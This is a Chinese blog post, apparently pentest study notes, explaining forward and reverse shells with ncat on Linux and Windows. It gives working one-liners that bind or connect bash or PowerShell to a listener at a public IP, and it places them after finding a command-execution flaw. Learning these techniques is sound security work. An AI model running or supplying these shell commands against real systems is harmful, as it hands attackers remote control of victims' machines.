正反向shell

已于 2024-05-24 20:46:27 修改
阅读量289 收藏 1
点赞数 2
文章标签: web安全 正反向shell
于 2024-05-24 12:16:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80044238/article/details/139171639
版权

正反向shell

在实际的应用场景中一般是先找到可以命令执行的漏洞,如果目标主机没有ncat我们要先执行下载ncat命令在被控的服务器上

正向shell

应用场景:在被控端的访问没有限制的时候,控制端向被控端发起了链接,控制端可以是公网ip也可以是内网ip

被控端为Linux:

被控端:ncat -lvp 8888 -e /bin/bash
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 /bin/bash

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

被控端为Windows

被控端:ncat -lvp 8888 -e powershell
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 powershell

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

在连接成功了之后(即在被控制端输入ncat 117.50.117.71 8888后)就可以输入指令查看被控端的各种信息

如图:

image-20240523221432307

反向shell

应用场景:在被控端口发访问有限制,控制无法直接访问到被控端

由被控端向控制端发起连接,控制端要具备公网地址

被控端为Linux:

被控端:ncat 117.50.177.71 9999 -e /bin/bash
作用:使用ncat连接到指定的ip地址端口,在建立连接后执行bashshell
控制端:ncat -lvp 9999
作用:监听指定端口

被控端为Windows

被控端:ncat 117.50.117.71 8888 -e powershell
作用:使用ncat连接指定的地址端口,并在连接成功后执行 powershell

控制端:ncat -lvp 8888
作用:监听指定的端口

在控制端监听后即可对被控端控制

屏幕截图 2024-05-24 121219

注意:正向shel是要保证被控端关闭防火墙

反向shell要保证控制端关闭防火墙

所以反向shell更容易执行

安全猴想变牛
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shp:Shell Please 1.0:反向shell代码生成器
03-03
Shell Please 1.0:反向Shell代码生成器 Shell Please是一种用于生成反向Shell代码的工具,它仅需几纳秒的时间。 每当执行渗透测试时,在使用RCE的情况下,我们始终需要反向Shell代码才能从目标系统获取反向Shell。...
reverse-shell-generator:基于Web的反向shell生成器
02-05
这个工具,正如其名,是一个基于Web的反向shell生成器,它能够帮助用户创建各种不同语言的反向shell代码片段。反向shell是一种允许攻击者从目标系统控制台获取命令行访问的技术,这在进行远程操作和权限提升时非常...
21_nc&wireshark
qq_45301512的博客
02-02 290
网上百度就有一堆介绍,平常主要用于监听和连接。
网络 Ncat 必须要掌握的核心用法
山水牧羊
04-04 2040
网络-nc netcat ncat 必须要掌握的核心用途1. Ncat介绍2. 安装3.端口连接与扫描3.1. 连接22端口3.2. 连接80端口3.3. 连接21端口3.4.端口扫描3.4.1.扫描TCP端口3.4.2.扫描UDP端口4.建立监听4.1.即时消息4.2. 文件传输4.3.建立远程shell Hack入门4.3.1.建立正向shell4.3.2.建立反向shell4.3.3.使用各...
ncat使用总结
weixin_34082854的博客
03-01 1042
功能 1. 监听本地端口 2. 连接目标端口 3. 传送文件 4. Remote Administration with Netcat(OSCP中给的分类,不知道此分类的作用,需要深入学习) 5. 反弹shell 6. 测两台机器间的网速 监听本地端口 # 临时监听端口 nc -l <PORT> # 临时监听TCP端口一次 nc -lu <PORT> # 临时监听UDP端口...
ncat详细介绍
热门推荐
demon7552003的小本本
05-22 1万+
ncat简介 ncat即Netcat。Netcat用于从TCP/UDP连接中读取或发送网络数据。cat是Linux中查看或连接文件的命令,所以netcat本意为从网络上查看文件内容。而Netcat的作者Hobbit为它添加了非常丰富的功能,使它几乎能够完成网络操作中各式各样的操作,所以Netcat在网络安全领域被称作“TCPIP的瑞士军刀”(“Swiss-army knife forTCP/IP”)。 Netcat稳定版1.10由Hobbit在1996年3月发布(开源软件),之后作者没有再对其进行维护,但该
vulnhub--hackme2-DHCP
weixin_45922278的博客
02-24 917
描述 “ hackme2”是中等难度级别的框。这是hackme系列的第二部分,其中更多的控制措施可以阻止恶意攻击。此外,您还必须开箱即用,以利用漏洞。目标是通过Web漏洞获得受限的特权访问,然后特权以root用户身份升级。该实验室的创建是为了模拟现实世界中的网络漏洞。 “ hackme2”使用DHCP并可能在mysqld自行关闭(非常罕见的情况)的情况下,尝试强制重启机器,并且随后应能正常工作。 https://idc.wanyunshuju.com/vul/1947.html 一、信息...
【渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反shell、bash、python、php、java的反向shell、内网转发)】
AA8j的博客
10-21 1232
文章目录实验环境1 下载与部署2 使用方法2.1 正向shell2.2 反向shell 实验环境 kali(攻击机,外网地址:192.168.8.48) Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10) CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13) Windows2012(DC,内网地址:10.1.1.2) 1 下载与部署 下载地址:https://github.com/AA8j/SecTools/tre
反向shell实操
TingSty小z的博客
02-25 4748
实验一: A机器传递信息到B机器: 测试环境macOS 10.15 1、A用nc命令 listen本机一个端口号 nc -l 8000 2、B 用telnet命令 去连接A机器的ip和端口号 telnet ipA 8000 3、显示连接成功后,B机器可以输入文本,文本会传输到A机器上。实现B-》A的信息传输 telnet的退出 ctrl+] 实验二: 反向shell,A机器控制B机器 一种方式是ssh 登录到B机器上,这种属于正向Shell,A主动连接B,然后控制B; 另一种方式:方向shell,B
【渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反shell、bash
2401_84969915的博客
05-13 849
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
shell配置nginx反向代理
08-23
shell配置nginx反向代理 作用:可以使用完全脚本配置,免去vi编辑nginx配置文件,可以集成到python或者java代码中,存命令行控制。 资源可运行,主要提供一个配置的思路。 此资源在一个api接口添加反向代理时使用到
hershell:多平台反向shell生成器
02-05
用编写的简单TCP反向shell。 它使用TLS来保护通信安全,并提供证书公钥指纹固定功能,以防止流量拦截。 支持的操作系统是: 视窗 Linux 苹果系统 FreeBSD及其衍生版本 为什么呢 尽管抄表器有效载荷很棒,但有时...
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 ...
网安零基础入门神书,全面介绍Web渗透核心攻击与防御方式!
最新发布
互联网架构小马的博客
07-29 783
Web安全是指Web服务程序的漏洞,通常涵盖Web漏洞、操作系统洞、数据库漏洞、中间件漏洞等。“渗透测试”作为主动防御的一种关键手段,对评估网络系统安全防护及措施至关重要,因为只有发现问题才能及时终止并预防潜在的安全风险。根据网络安全调查统计,75%的网络攻击行为都是来自Web应用层面而非网络层面所以,学习Web安全的重要性不言而喻。Web安全吸引越来越多的人学习,有人是被其炫酷感染,有人是出于对技术的热爱,但大多数人还是为了高薪资和职场发展。
WEB安全】 PHP基础与数据库教学下(超详细)
weixin_60838266的博客
07-29 1045
PHP 连接 MySQL在 PHP 使用 MySQL 数据库前,你需要先将它们连接。PHP 5 及以上版本建议使用以下方式连接 MySQL :MySQLi extension ("i" 意为 improved)在 PHP 早起版本中我们使用 MySQL 扩展。但该扩展在 2012 年开始不建议使用。我是该用 MySQLi ,还是 PDO?如果你需要一个简短的回答,即 "你习惯哪个就用哪个"。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 882
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 751
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
正向shell和反向shell
08-19
正向shell和反向shell是两种不同的网络连接方式。正向shell是控制端主动发起连接去连接被控制端,而反向shell是被控制端主动连接控制端。在实际应用中,大多数情况下采用反向shell,因为正向shell有很多因素导致连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值